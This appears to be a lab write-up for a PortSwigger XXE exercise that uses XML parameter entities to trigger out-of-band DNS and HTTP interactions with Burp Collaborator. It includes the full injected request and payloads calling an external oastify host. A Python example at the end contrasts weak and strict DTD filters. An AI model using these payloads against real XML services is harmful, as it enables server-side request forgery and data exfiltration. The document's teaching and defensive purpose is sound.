Blind XXE with out-of-band interaction via XML parameter entities

Description

This lab has a "Check stock" feature that parses XML input, but does not display any unexpected values, and blocks requests containing regular external entities.

To solve the lab, use a parameter entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.

Approach

After accessing the lab, I encountered a POST request sending XML data to the backend:

POST /product/stock HTTP/2
Host: 0a14008e04efe1c3830015e900950001.web-security-academy.net
Cookie: session=WjmqxdAKpLkSGsy1ScUCoZUx4dQirEGC
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 
...

<?xml version="1.0" encoding="UTF-8"?>
	<stockCheck>
		<productId>1</productId>
		<storeId>1</storeId>
	</stockCheck>

My initial attempt to exploit XXE by fetching local files failed, likely due to input validation or XML parser hardening. To overcome this, and because the lab blocks regular external entities, I decided to use XML parameter entities instead. These entities are a special kind of XML entity that can only be referenced elsewhere within the document type definition (DTD).

The DTD format of a regular external entity, which the lab blocks, was as follows:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://splacb0ckpba1ws7l9v6rpsv4mady3ms.oastify.com"> &xxe;]>

The DTD format of the parameter entity payload, where the entity is declared with a % character and referenced as %xxe; inside the DTD itself, is as follows:

<!DOCTYPE ichyaboy [ <!ENTITY % xxe SYSTEM "http://**********.web-attacker.com"> %xxe; ]>

I injected this payload and then monitored the Burp Collaborator tab, pressing "Poll now" to check for any interactions.

POST /product/stock HTTP/2
Host: 0a14008e04efe1c3830015e900950001.web-security-academy.net
Cookie: session=WjmqxdAKpLkSGsy1ScUCoZUx4dQirEGC
<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://splacb0ckpba1ws7l9v6rpsv4mady3ms.oastify.com"> %xxe;]>
	<stockCheck>
		<productId>1</productId>
		<storeId>1</storeId>
	</stockCheck>

Upon observing DNS and HTTP interactions in Burp Collaborator, I confirmed that the XXE injection had succeeded, which solved the lab.
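The lab blocks regular external entities but not parameter entities, which is exactly the gap this write-up uses. As an added illustration (not the lab's or PortSwigger's code, and not part of the original write-up), the Python below records DTD declarations through expat callbacks and contrasts an entity-type filter with the robust fix of rejecting any DOCTYPE; the Collaborator hostnames are placeholders.

```python
"""Added example: why blocking only regular external entities is not enough.
The lab rejects general external entities yet the parameter-entity payload still
reaches the parser; the robust fix is to reject any DOCTYPE. Hostnames are placeholders."""
import xml.parsers.expat
from dataclasses import dataclass, field


@dataclass
class DtdFindings:
    has_doctype: bool = False
    external_general: list = field(default_factory=list)    # <!ENTITY x SYSTEM ...>
    external_parameter: list = field(default_factory=list)  # <!ENTITY % x SYSTEM ...>


def inspect_dtd(xml_bytes: bytes) -> DtdFindings:
    """Record DTD declarations via expat callbacks without resolving any of them."""
    found = DtdFindings()
    parser = xml.parsers.expat.ParserCreate()
    # No ExternalEntityRefHandler is installed, so expat never fetches SYSTEM URIs.

    def on_doctype(name, sysid, pubid, has_internal_subset):
        found.has_doctype = True

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        if sysid is None:
            return  # internal entity: no file or network access involved
        (found.external_parameter if is_param else found.external_general).append(sysid)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(xml_bytes, True)
    except xml.parsers.expat.ExpatError:
        pass  # declarations seen before a syntax error are already recorded
    return found


def weak_filter_allows(xml_bytes: bytes) -> bool:
    """Mimics the lab's check: only regular (general) external entities are blocked."""
    return not inspect_dtd(xml_bytes).external_general


def strict_filter_allows(xml_bytes: bytes) -> bool:
    """Stock-check XML never needs a DTD, so any DOCTYPE is rejected outright."""
    return not inspect_dtd(xml_bytes).has_doctype


# Constructed request bodies modelled on the write-up (placeholder hostnames).
BENIGN = b'<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>'
GENERAL_XXE = (b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://PLACEHOLDER.oastify.com">]>'
               b'<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>')
PARAM_XXE = (b'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://PLACEHOLDER.oastify.com"> %xxe;]>'
             b'<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>')
```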